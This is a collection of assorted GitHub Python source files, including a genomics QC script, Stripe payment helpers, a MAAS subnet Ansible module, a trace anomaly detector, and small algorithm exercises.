= input.split(\".\")[0]+\"_pruned\"\r\n\r\n if result == 0: # ld_pruning couldn't be performed --> making final vcf from MendelQC step\r\n subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--recode\", \"vcf\", \"--out\", out_file])\r\n\r\n else: # making final vcf of pruned file\r\n subprocess.call([\"plink\", \"--bfile\", \"pruned_data\", \"--recode\", \"vcf\", \"--out\", out_file])\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n vcf_to_plink(args.input)\r\n\r\n quality_control(m=str(args.m), maf=str(args.maf), g=str(args.g), hw=str(args.hw), f=str(args.f), s=str(args.s))\r\n\r\n if args.ldprune == 'i':\r\n result = LD_pruning_indep(indep_w=args.indep_window, indep_snp=args.indep_snp, indep_vif=args.indep_vif)\r\n\r\n else:\r\n result = LD_pruning_indep_pair(indep_w=args.indep_window, indep_snp=args.indep_snp, indep_threshold=args.indep_threshold)\r\n\r\n plink_to_vcf(args.input, result)\r\n\r\n print(\"Done, Exiting!!!\")\r\n\r\n","repo_name":"mariamnawaz1/VCF-Quality-Control","sub_path":"QC_script.py","file_name":"QC_script.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"8029248","text":"from typing import Any\nimport stripe\nfrom dependency_injector.wiring import Provide, inject, Closing\nfrom django.http import HttpRequest\n\nfrom stripe_project.containers import StripeContainer\nfrom stripe_app.stripe import StripeAPI\n\n\n@inject\ndef create_session_for_item(\n request: HttpRequest,\n item: dict[str, str | int],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.checkout.Session:\n session = stripe_api.create_session(request, item)\n return session\n\n\n@inject\ndef create_payment_for_item(\n item: dict[str, str | int],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.PaymentIntent:\n session = stripe_api.create_payment_intent(item[\"price\"])\n return session\n\n\n@inject\ndef create_session_for_order(\n request: HttpRequest,\n order: dict[str, Any],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.checkout.Session:\n discounts = None\n if not all(order[\"discount\"][field] is None for field in order[\"discount\"]):\n coupon = stripe_api.create_coupon(data=order[\"discount\"])\n discounts = [{\"coupon\": f\"{coupon.id}\"}]\n tax = None\n if not all(order[\"tax\"][field] is None for field in order[\"tax\"]):\n tax = stripe_api.create_tax(data=order[\"tax\"])\n session = stripe_api.create_session(\n request, order[\"items\"], discounts=discounts, tax=tax\n )\n return session\n\n\n@inject\ndef create_payment_for_order(\n order: dict[str, Any],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.PaymentIntent:\n price = order[\"unit_amount\"]\n if order[\"tax\"][\"percentage\"]:\n price += price * (order[\"tax\"][\"percentage\"] / 100)\n if order[\"discount\"][\"discount_value\"]:\n price -= price * order[\"discount\"][\"discount_value\"] / 100\n session = stripe_api.create_payment_intent(price)\n return session\n","repo_name":"Kimiyori/test-stripe","sub_path":"src/stripe_app/services/stripe_services.py","file_name":"stripe_services.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71178435475","text":"\n\"\"\"\nDynamic Streaming Parser\nAuthor: Dingwen Tao (ustc.dingwentao@gmail.com)\nCreate: April, 2018\nModified: June, 2018\n\"\"\"\n\n# prog_names is the indexed set of program names in the attributes\n# comm_ranks is the MPI rank\n# threads is the thread ID (rank)\n# event_types is the indexed set of event types in the attributes\n# func_names is the indexed set of timer names in the attributes\n# counters is the indexed set of counter names in the attributes\n# event_types_comm is the indexed set of event types related to communication in the attributes\n# tag is the MPI tag\n# partner is the other side of a point-to-point communication\n# num_bytes is the amount of data sent\n\nfrom collections import deque as dq\nfrom collections import Counter as ct\nimport pickle\nimport itertools\nimport adios as ad\nimport numpy as np\nimport scipy.io as sio\nimport configparser\nimport MiLOF\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neighbors import LocalOutlierFactor\n\n\ndef Parser(configFile):\n\tmethod = \"BP\"\n\tinit = \"verbose=3;\"\n\n\t# read parameters from configuration file\n\tconfig = configparser.ConfigParser()\n\tconfig.read(configFile)\n\tin_bp_file = config['Parser']['InputBPFile'] # input bp file path\n\tprov_db_path = config['Parser']['ProvDBPath'] # provenance output database path\n\tqueue_size = int(config['Parser']['QueueSize']) # provenance data size\n\tint_func_num = int(config['Parser']['InterestFuncNum']) # interested function size\n\n\t# initialize adios streaming mode\n\tad.read_init(method, parameters=init)\n\tfin = ad.file(in_bp_file, method, is_stream=True, timeout_sec=10.0)\n\tfout = open(prov_db_path, \"wb\")\n\n\t# read attributes\n\tdb = dq(maxlen=queue_size)\n\tname = np.array(['prog_names', 'comm_ranks', 'threads', 'event_types', 'func_names', 'counters', 'counter_value', 'event_types_comm', 'tag', 'partner', 'num_bytes', 'timestamp']).reshape(1, 12)\n\tattr = fin.attr\n\tnattrs = fin.nattrs\n\tattr_name = list(fin.attr)\n\tattr_value = np.empty(nattrs, dtype=object)\n\tnum_func = 0\n\tfunc_name = []\n\tfor i in range(0, len(attr_name)):\n\t\tattr_value[i] = attr[attr_name[i]].value\n\t\t# count function number and names\n\t\tif attr_name[i].startswith('timer'):\n\t\t\tnum_func = num_func + 1\n\t\t\tfunc_name.append(attr_value[i])\n\t\tif attr_name[i].startswith('event_type'):\n\t\t\tprint(attr_value[i])\n\tattr_name = np.array(attr_name)\n\tfunc_name = np.array(func_name)\n\n\ti = 0\n\ttotal_timestep = 0\n\tanomaly_indices = []\n\twhile True:\n\t\tprint(\">>> step:\", i)\n\n\t\tvname = \"event_timestamps\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tevent = var.read(nsteps=num_steps)\n\t\t\tdata_event = np.zeros((event.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_event[:, 0:5] = event[:, 0:5]\n\t\t\tdata_event[:, 11] = event[:, 5]\n\t\t\tdata_step = data_event\n\t\t\t# count most common functions\n\t\t\tint_func = ct(data_event[:, 4]).most_common(int_func_num) # e.g., [(16, 14002), (15, 14000), (13, 6000),...]\n\n\t\tvname = \"counter_values\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tcounter = var.read(nsteps=num_steps)\n\t\t\tdata_counter = np.zeros((counter.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_counter[:, 0:3] = counter[:, 0:3]\n\t\t\tdata_counter[:, 5:7] = counter[:, 3:5]\n\t\t\tdata_counter[:, 11] = counter[:, 5]\n\t\t\tdata_step = np.concatenate((data_step, data_counter), axis=0)\n\n\t\tvname = \"comm_timestamps\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tcomm = var.read(nsteps=num_steps)\n\t\t\tdata_comm = np.zeros((comm.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_comm[:, 0:4] = comm[:, 0:4]\n\t\t\tdata_comm[:, 8:11] = comm[:, 4:7]\n\t\t\tdata_comm[:, 11] = comm[:, 7]\n\t\t\tdata_step = np.concatenate((data_step, data_comm), axis=0)\n\n\t\t# sort data in this step by timestamp\n\t\tdata_step = data_step[data_step[:, 11].argsort()]\n\n\t\tif i == 0:\n\t\t\tdata_global = data_step\n\t\telse:\n\t\t\tdata_global = np.concatenate((data_global, data_step), axis=0)\n\n\t\t# lauch anomaly detection\n\t\tanomaly_flag = False\n\n\t\t# dynamic interest list\n\t\tif len(int_func) < 3:\n\t\t\tprint (\"Most interested function:\\n\", func_name[int_func[0][0]])\n\t\telse:\n\t\t\tprint (\"Most three interested functions:\\n\", func_name[int_func[0][0]], \"\\n\", func_name[int_func[1][0]], \"\\n\", func_name[int_func[2][0]])\n\n\t\t# matching data\n\t\tglobal_index = (np.arange(data_step.shape[0]) + total_timestep).reshape(data_step.shape[0], 1)\n\t\tdata_step = np.append(data_step, global_index, axis=1)\n\t\tfunc_data = data_step[data_step[:, 4]==21] # 21 is adios_close, TODO\n\t\tentry_data = func_data[func_data[:, 3]==0] # 0 is entry in the current data, TODO\n\t\texit_data = func_data[func_data[:, 3]==1] # TODO\n\n\t\t# generating streaming data in terms of one function\n\t\tdatastream = []\n\t\tfor j in range(0, entry_data.shape[0]):\n\t\t\tfor k in range(0, exit_data.shape[0]):\n\t\t\t\tif np.array_equal(entry_data[j, 0:3], exit_data[k, 0:3]):\n\t\t\t\t\tentry_time = entry_data[j,11]\n\t\t\t\t\texec_time = exit_data[k, 11] - entry_data[j, 11]\n\t\t\t\t\tdatastream += [[entry_time, exec_time]]\n\t\t\t\t\tbreak\n\t\tdatastream = np.array(datastream)\n\n\t\t# anomaly detection\n\t\tif (datastream.shape[0]):\n\t\t\tscaler = MinMaxScaler()\n\t\t\tscaler.fit(datastream)\n\t\t\tdatastream = scaler.transform(datastream)\n\t\t\t# Should call MILOF API, but here for simplicity, call LOF directly\n\t\t\tclf = LocalOutlierFactor(algorithm=\"kd_tree\", metric='euclidean')\n\t\t\tanomalies = entry_data[clf.fit_predict(datastream)==-1]\n\t\t\tif anomalies.shape[0]:\n\t\t\t\tanomaly_indices.extend(anomalies[:, -1].tolist())\n\t\t\t\tanomaly_flag = True\n\n\t\t# add or dump queue\n\t\tif anomaly_flag:\n\t\t\t# dump queue to file\t\n\t\t\tdb.appendleft(attr_value)\n\t\t\tdb.appendleft(attr_name)\n\t\t\tdb.appendleft(nattrs)\n\t\t\tprint(\">>> Identified anomalies and dump data to binary.\")\n\t\t\tprint(\">>> Serialization ...\")\n\t\t\tpickle.dump(db, fout)\n\t\t\t# db[0]: the number of attributes\n\t\t\t# db[1]: the names of attributes\n\t\t\t# db[2]: the values of attributes\n\t\t\t# from db[3]: the trace data\n\t\telse:\n\t\t\t# add data to queue\n\t\t\tdb.extend(data_step)\n\n\t\tprint(\"Size of current timestep =\", data_step.shape[0])\n\t\ttotal_timestep += data_step.shape[0]\n\t\tprint(\"Size of total timestep = \", total_timestep)\n\n\t\tprint(\">>> Advance to next step ... \")\n\t\tif (fin.advance() < 0):\n\t\t\tbreak\n\n\t\ti += 1\n\n\tfin.close()\n\tfout.close()\n\n\tprint(\">>> Complete passing data.\")\n\tprint(\">>> Test of deserialization.\")\n\tprint(\">>> Load data ...\")\n\tfin = open(prov_db_path, \"rb\")\n\tdb2 = pickle.load(fin)\n\tprint(\">>> Passed test of deserialization.\")\n\n\tprint(\"\\n**** Print info ****\")\n\tprint(\">>> Number of attributes =\", db2[0])\n\tprint(\">>> First 20 Names of attributes =\", db2[1][0:20])\n\tprint(\">>> First 20 Values of attributes =\", db2[2][0:20])\n\tprint(\">>> First 20 trace data =\", np.array(list(itertools.islice(db2, 3, 20))))\n\tprint(\">>> Indices of anomalies in terms of entry:\", anomaly_indices)\n\tfin.close()\n\t\n\timport json\n\tfile_path = \"data.json\"\n\twith open(file_path, 'w') as outfile:\n\t\tjson.dump(data_global.tolist(), outfile)\n\toutfile.close()\n\t\n\tfile_path = \"anomaly.json\"\n\twith open(file_path, 'w') as outfile:\n\t\tjson.dump(anomaly_indices, outfile)\n\toutfile.close()\n","repo_name":"dingwentao/MILOF","sub_path":"lib/strmParser.py","file_name":"strmParser.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"84"} +{"seq_id":"11180543282","text":"DOCUMENTATION = '''\n---\nmodule: maas_subnet\nshort_description: Manage MAAS Clusters Interfaces\noptions:\n maas:\n description:\n - URL of MAAS server\n default: http://localhost/MAAS/api/1.0/\n key:\n description:\n - MAAS API key\n required: yes\n name:\n description:\n - name of the subnet\n required: yes\n space:\n description:\n - network space of the subnet\n dns_servers:\n description:\n - dns servers for the subnet\n gateway_ip:\n description:\n - gateway IP for the subnet\n cidr:\n description:\n - cidr for the subnet\n state:\n description:\n - possible states for this subnet\n choices: ['present', 'absent', 'query']\n default: present\n\nrequirements: [ipaddress, requests_oauthlib, maasclient]\nauthor: David Bainbridge\n'''\n\nEXAMPLES = '''\nexamples:\n maas_subnet:\n maas: http://my.maas.server.com/MAAS/api/1.0/\n key: 'xBvr9dx5k7S52myufC:fqBXV7hJgXegNZDw9c:K8hsmL47XjAppfQy2pDVW7G49p6PELgp'\n name: MySubnet\n state: present\n\n maas_subnet:\n maas: http://my.maas.server.com/MAAS/api/1.0/\n key: 'xBvr9dx5k7S52myufC:fqBXV7hJgXegNZDw9c:K8hsmL47XjAppfQy2pDVW7G49p6PELgp'\n name: MyDeadSubnet\n state: absent\n'''\n\nimport sys\nimport json\nimport ipaddress\nimport requests\nimport string\nfrom maasclient.auth import MaasAuth\nfrom maasclient import MaasClient\n\ndebug = []\n\n# For some reason the maasclient doesn't provide a put method. So\n# we will add it here\ndef put(client, url, params=None):\n return requests.put(url=client.auth.api_url + url,\n auth=client._oauth(), data=params)\n\n# Attempt to interpret the given value as a JSON object, if that fails\n# just return it as a string\ndef string_or_object(val):\n try:\n return json.loads(val)\n except:\n return val\n\n# Return a copy of the given dictionary with any `null` valued entries\n# removed\ndef remove_null(d_in):\n d = d_in.copy()\n to_remove = []\n for k in d.keys():\n if d[k] == None:\n to_remove.append(k)\n for k in to_remove:\n del d[k]\n return d\n\n# Removes keys from a dictionary either using an include or\n# exclude filter This change happens on given dictionary is\n# modified.\ndef filter(filter_type, d, keys):\n if filter_type == 'include':\n for k in d.keys():\n if k not in keys:\n d.pop(k, None)\n else:\n for k in d.keys():\n if k in keys:\n d.pop(k, None)\n\n# Converts a subnet structure with names for the vlan and space to their\n# ID equivalents that can be used in a REST call to MAAS\ndef convert(maas, subnet):\n copy = subnet.copy()\n copy['space'] = get_space(maas, subnet['space'])['id']\n fabric_name, vlan_name = string.split(subnet['vlan'], ':', 1)\n fabric = get_fabric(maas, fabric_name)\n copy['vlan'] = get_vlan(maas, fabric, vlan_name)['id']\n return copy\n\n# replaces the expanded VLAN object with a unique identifier of\n# `fabric`:`name`\ndef simplify(subnet):\n copy = subnet.copy()\n if 'dns_servers' in copy.keys() and type(copy['dns_servers']) == list:\n copy['dns_servers'] = \",\".join(copy['dns_servers'])\n if subnet['vlan'] and type(subnet['vlan']) == dict:\n copy['vlan'] = \"%s:%s\" % (subnet['vlan']['fabric'], subnet['vlan']['name'])\n return copy\n\n# Deterine if two dictionaries are different\ndef different(have, want):\n have_keys = have.keys()\n for key in want.keys():\n if (key in have_keys and want[key] != have[key]) or key not in have_keys:\n debug.append({\"have\": have, \"want\": want, \"key\": key})\n return True\n return False\n\n# Get a space object form MAAS based on its name\ndef get_space(maas, name):\n res = maas.get('/spaces/')\n if res.ok:\n for space in json.loads(res.text):\n if space['name'] == name:\n return space\n return None\n\n# Get a fabric object from MAAS based on its name\ndef get_fabric(maas, name):\n res = maas.get('/fabrics/')\n if res.ok:\n for fabric in json.loads(res.text):\n if fabric['name'] == name:\n return fabric\n return None\n\n# Get a VLAN object form MAAS based on its name\ndef get_vlan(maas, fabric, name ):\n res = maas.get('/fabrics/%d/vlans/' % fabric['id'])\n if res.ok:\n for vlan in json.loads(res.text):\n if vlan['name'] == name:\n return vlan\n return None\n\n# Get an subnet from MAAS using its name, if not found return None\ndef get_subnet(maas, name):\n res = maas.get('/subnets/')\n if res.ok:\n for subnet in json.loads(res.text):\n if subnet['name'] == name:\n return simplify(subnet)\n return None\n\n# Create an subnet based on the value given\ndef create_subnet(maas, subnet):\n merged = subnet.copy()\n # merged['op'] = 'new'\n res = maas.post('/subnets/', convert(maas, merged))\n if res.ok:\n return { 'error': False, 'status': get_subnet(maas, merged['name']) }\n return { 'error': True, 'status': string_or_object(res.text) }\n\n# Delete an subnet based on the name\ndef delete_subnet(maas, name):\n res = maas.delete('/subnets/%s/' % name)\n if res.ok:\n return { 'error': False }\n return { 'error': True, 'status': string_or_object(res.text) }\n\ndef update_subnet(maas, have, want):\n merged = have.copy()\n merged.update(want)\n res = put(maas, '/subnets/%s/' % merged['id'], convert(maas, merged))\n if res.ok:\n return { 'error': False, 'status': get_subnet(maas, merged['name']) }\n return { 'error': True, 'status': string_or_object(res.text) }\n\ndef main():\n module = AnsibleModule(\n argument_spec = dict(\n maas=dict(default='http://localhost/MAAS/api/1.0/'),\n key=dict(required=True),\n name=dict(required=True),\n space=dict(required=False),\n dns_servers=dict(required=False),\n gateway_ip=dict(required=False),\n cidr=dict(required=False),\n state=dict(default='present', choices=['present', 'absent', 'query'])\n ),\n supports_check_mode = False\n )\n\n maas = module.params['maas']\n key = module.params['key']\n state = module.params['state']\n\n # Construct a sparsely populate desired state\n desired = remove_null({\n 'name': module.params['name'],\n 'space': module.params['space'],\n 'dns_servers': module.params['dns_servers'],\n 'gateway_ip': module.params['gateway_ip'],\n 'cidr': module.params['cidr'],\n })\n\n # Authenticate into MAAS\n auth = MaasAuth(maas, key)\n maas = MaasClient(auth)\n\n # Attempt to get the subnet from MAAS\n subnet = get_subnet(maas, desired['name'])\n\n # Actions if the subnet does not currently exist\n if not subnet:\n if state == 'query':\n # If this is a query, returne it is not found\n module.exit_json(changed=False, found=False)\n elif state == 'present':\n # If this should be present, then attempt to create it\n res = create_subnet(maas, desired)\n if res['error']:\n module.fail_json(msg=res['status'])\n else:\n module.exit_json(changed=True, subnet=res['status'])\n else:\n # If this should be absent, then we are done and in the desired state\n module.exit_json(changed=False)\n\n # Done with subnets does not exists actions\n return\n\n # Actions if the subnet does exist\n if state == 'query':\n # If this is a query, return the subnet\n module.exit_json(changed=False, found=True, subnet=subnet)\n elif state == 'present':\n # If we want this to exists check to see if this is different and\n # needs updated\n if different(subnet, desired):\n res = update_subnet(maas, subnet, desired)\n if res['error']:\n module.fail_json(msg=res['status'])\n else:\n module.exit_json(changed=True, subnet=res['status'], debug=debug)\n else:\n # No differences, to nothing to change\n module.exit_json(changed=False, subnet=subnet)\n else:\n # If we don't want this subnet, then delete it\n res = delete_subnet(maas, subnet['name'])\n if res['error']:\n module.fail_json(msg=res['status'])\n else:\n module.exit_json(changed=True, subnet=subnet)\n\n# this is magic, see lib/ansible/module_common.py\n#<>\nif __name__ == '__main__':\n main()\n","repo_name":"opencord/maas","sub_path":"library/maas_subnet.py","file_name":"maas_subnet.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"84"} +{"seq_id":"39409336035","text":"from django.utils.decorators import available_attrs, decorator_from_middleware\nfrom ..middleware.access import AccessViewMiddleware\nfrom functools import wraps\n\ncsrf_or_api_token_protect = decorator_from_middleware(AccessViewMiddleware)\ncsrf_or_api_token_protect.__name__ = 'csrf_or_api_token_protect'\ncsrf_or_api_token_protect.__doc__ = \"\"\"\nUse this decorator to ensure that a view sets a CSRF cookie, whether or not it\nuses the csrf_token template tag, or the CsrfViewMiddleware is used.\n\"\"\"\n\n\ndef csrf_exempt(view_func):\n \"\"\"\n Marks a view function as being exempt from the CSRF view protection.\n \"\"\"\n\n # We could just do view_func.csrf_exempt = True, but decorators\n # are nicer if they don't have side-effects, so we return a new\n # function.\n def wrapped_view(*args, **kwargs):\n return view_func(*args, **kwargs)\n\n wrapped_view.csrf_exempt = True\n return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)\n","repo_name":"EndyKaufman/django-postgres-angularjs-blog","sub_path":"app/account/decorators/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"28713186033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 27 10:47:17 2017\n\n@author: Alexandru Meterez\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\ndef Circle(x, y, p):\n return (pow(pow(abs(x), p) + pow(abs(y), p), 1/p))\n\nxx = np.linspace(-2, 2, 400)\nyy = np.linspace(-2, 2, 400)\n[X, Y] = np.meshgrid(xx, yy)\nZ = Circle(X, Y, 1)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nfig.subplots_adjust(left = 0.25, bottom = 0.25)\nline = ax.contour(X, Y, Z, [1])\n\n#Adding the sliders\nnormSliderAx = fig.add_axes([0.25, 0.15, 0.65, 0.03])\nnormSlider = Slider(normSliderAx, 'p-norm', 1, 30, valinit = 1)\ndef sliders_on_changed(val):\n ax.clear()\n line = []\n line = ax.contour(X, Y, Circle(X, Y, val), [1])\n \nnormSlider.on_changed(sliders_on_changed)\nplt.show()","repo_name":"alexandrumeterez/numericalanalysis","sub_path":"unitcircles/unitcircles.py","file_name":"unitcircles.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72737269396","text":"import urllib2\n\nimport staccato.protocols.interface as base\nfrom staccato.common import exceptions\n\n\nclass HttpProtocol(base.BaseProtocolInterface):\n\n def __init__(self, service_config):\n self.conf = service_config\n\n def _validate_url(self, url_parts):\n pass\n\n def _parse_opts(self, opts):\n return opts\n\n def new_write(self, dsturl_parts, dst_opts):\n opts = self._parse_opts(dst_opts)\n return opts\n\n def new_read(self, srcurl_parts, src_opts):\n opts = self._parse_opts(src_opts)\n return opts\n\n def get_reader(self, url_parts, writer, monitor, source_opts, start=0,\n end=None, **kwvals):\n self._validate_url(url_parts)\n\n return HttpReadConnection(url_parts,\n writer,\n monitor,\n start=start,\n end=end,\n **kwvals)\n\n def get_writer(self, url_parts, dest_opts, checkpointer, **kwvals):\n raise exceptions.StaccatoNotImplementedException(\n _('The HTTP protocol is read only'))\n\n\nclass HttpReadConnection(base.BaseReadConnection):\n\n def __init__(self,\n url_parts,\n writer,\n monitor,\n start=0,\n end=None,\n buflen=65536,\n **kwvals):\n whole_url = url_parts.geturl()\n\n req = urllib2.Request(whole_url)\n range_str = 'bytes=%sd-' % start\n if end and end > start:\n range_str = range_str + str(end)\n req.headers['Range'] = range_str\n self.h_con = urllib2.urlopen(req)\n self.pos = start\n self.eof = False\n self.writer = writer\n self.buflen = buflen\n self.monitor = monitor\n\n def _read(self, buflen):\n buf = self.h_con.read(buflen)\n if not buf:\n return True, 0\n self.writer.write(buf, self.pos)\n\n self.pos = self.pos + len(buf)\n return False, len(buf)\n\n def process(self):\n try:\n while not self.monitor.is_done() and not self.eof:\n self.eof, read_len = self._read(self.buflen)\n finally:\n self.h_con.close()\n","repo_name":"buzztroll/staccato","sub_path":"staccato/protocols/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21887590635","text":"#Jon Ander Martin, Dani Lazaro, Almudena Chapa\n\n#Clustering algorithm for customer allocation\n#The vehicles are the centers of the clusters \n#Setting waiting time of the vehicle to the highest one of the customers in the pool...\n #... gives more weight to the ones that have been in queue the longest\nimport numpy as np\n\ndef get_customers(vehicle_position, customer_list, k):\n \"\"\"\n get_customers selects the k customers closer to a vehicle from the\n customer pool\n\n Parameters\n ----------\n vehicle_position : LIST\n [x,y] position of the vehicle.\n customer_list : LIST\n [customer_1, customer_2, ...].\n k : INT\n Number of customers to pick from customer_list.\n\n Returns\n -------\n selected_customers : LIST\n List with selected customers' vectors.\n new_pool : LIST\n list of customers from customer_list that have not been selected by\n get_customers.\n\n \"\"\"\n \n ## find customer with maximum waiting time\n max_time = 0\n for customer in customer_list:\n time = customer[-1]\n if time > max_time:\n max_time = time\n \n ## define vehicle's vector\n vehicle = []\n vehicle.extend(vehicle_position)\n vehicle.extend(vehicle_position)\n vehicle.append(max_time)\n \n ## calculate distances from vehicle to each customer\n distances = []\n vehicle_np = np.array(vehicle)\n for customer in customer_list:\n customer_np = np.array(customer)\n distances.append(np.linalg.norm(vehicle_np - customer_np))\n \n idx = np.argsort(distances)\n idx = idx[0:k]\n \n ## list with customers\n selected_customers = []\n for i in range(k):\n selected_customers.append(customer_list[idx[i]])\n \n ## customer pool without the selected customers\n new_pool = list(customer_list)\n for j in sorted(idx, reverse=True):\n del new_pool[j]\n \n return selected_customers, new_pool\n \n \n \n \nif __name__ == \"__main__\":\n \n customer_pool = [[3,4,5,6,0],\n [1,2,7,8,3],\n [-1,1,5,5,4],\n [-5,-4,3,3,3],\n [0,0,9,9,8],\n [1,-5,5,-1,7]]\n \n get_customers([1,2], customer_pool, 3)","repo_name":"DaniLazaro97/Live-Route-Planning-Optimization-of-the-Night-Ride","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"43555026837","text":"class ListNode:\n def __init__(self, val=0, next=None) :\n self.val = val\n self.next = next\n\ndef addTwoNumers(l1 : ListNode, l2 : ListNode) -> ListNode :\n head = ListNode(0)\n tracker = head\n\n carry = 0\n\n while carry or l1 or l2 :\n if l1 :\n carry += l1.val\n l1 = l1.next\n\n if l2 : \n carry += l2.val\n l2 = l2.next\n\n tracker.next = ListNode(carry % 10)\n carry //= 10\n tracker = tracker.next\n\n return head.next","repo_name":"ozom18/leetcode-mysolution","sub_path":"Add Two Numbers/AddTwoNumbers.py","file_name":"AddTwoNumbers.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37058214238","text":"# graph : 노드 연결 정보를 담고 있는 2차원 리스트, v : 방문하고자 하는 노드, visited : 방문 처리를 나타내는 1차원 리스트\ndef DFS(graph, v, visited):\n\n visited[v] = True\n print(v, end='')\n # 현재 노드와 연결된 다른 노드를 재귀적으로 방문\n for i in graph[v]:\n if not visited[i]:\n DFS(graph, v, visited)\n\n# 각 노드가 연결된 정보를 리스트 자료형으로 표현(2차원 리스트), 거리 정보는 없음\ngraph = [\n [], # 0번 노드부터 시작\n [2,3,8],\n [1,7],\n [1,4,5],\n [3,5],\n [3,4],\n [7],\n [2,6,8],\n [1,7]\n]\n\nvisited =[False] * len(graph)\n\nDFS(graph, 1, visited)","repo_name":"y2336789/python","sub_path":"DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71229660114","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nx = np.linspace(-2, 2, 1000)\n#the syntax line_cosh, = ... to assign the returned line object to the variable line_cosh rather than the list containing that object\nline_cosh, = ax.plot(x, np.cosh(x))\nline_quad, = ax.plot(x, x**2 / 2)\nplt.show()\n","repo_name":"BrunoCampana/practicing-scientific-programming-with-python","sub_path":"catenary.py","file_name":"catenary.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"74058289875","text":"'''\nAuthor: Jaime Liew (jyli@dtu.dk)\n\nAnimates the timestep output files of the heat equation solver.\n\nRequirements:\n- numpy\n- matplotlib\n- moviepy\n'''\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nfrom moviepy.editor import VideoClip\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport numpy as np\n\n\ndef make_frame(t):\n filename = f'diff{make_frame.counter:06d}.dat'\n\n A = np.loadtxt(filename)\n x, y, T = A[:, 0].reshape((21, 21)), A[:, 1].reshape(\n (21, 21)), A[:, 2].reshape((21, 21))\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_wireframe(x, y, T)\n ax.set_zlim(0, 1)\n\n img = mplfig_to_npimage(fig)\n plt.close(fig)\n\n make_frame.counter += 1\n return img\n\n\nmake_frame.counter = 1\n\nif __name__ == '__main__':\n fps = 20\n N = 200\n duration = (N - 1) / fps\n\n animation = VideoClip(make_frame, duration=duration)\n animation.write_gif('gif.gif', fps=fps)\n","repo_name":"jaimeliew1/high_performance_computing_course","sub_path":"week1/heat_equation/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23944001557","text":"\r\n\r\ndef climbingLeaderboard(scores, alice):\r\n\r\n if not (len(scores) > 0 and len(alice) > 0):\r\n return []\r\n\r\n scoreIndex = []\r\n\r\n previous = scores[0]\r\n scoreIndex.append(previous)\r\n tracker = 1\r\n counter = len(scores)\r\n for i in range(1, counter):\r\n elem = scores[i]\r\n\r\n if elem == previous:\r\n continue\r\n\r\n previous = scores[i]\r\n scoreIndex.append(previous)\r\n tracker = tracker + 1\r\n\r\n rank = len(scoreIndex)\r\n tracker = len(scoreIndex)-1\r\n aliceRanks = []\r\n j = 0\r\n counter = len(alice)\r\n for i in range(0, counter):\r\n for j in range(tracker, -1, -1):\r\n if alice[i] >= scoreIndex[j]:\r\n rank = rank - 1\r\n continue\r\n break\r\n tracker = rank - 1\r\n aliceRanks.append(rank + 1)\r\n\r\n return aliceRanks\r\n\r\nprint(climbingLeaderboard([100, 100, 50, 40, 40, 20, 10],[120 ,120 ,120 ,120]))\r\n#print(climbingLeaderboard([100, 100, 50, 40, 40, 20, 10],[5, 25, 50, 120]))\r\n","repo_name":"nikhillahoti/HackerRank-Solutions","sub_path":"ClimbingTheLeaderboard.py","file_name":"ClimbingTheLeaderboard.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} 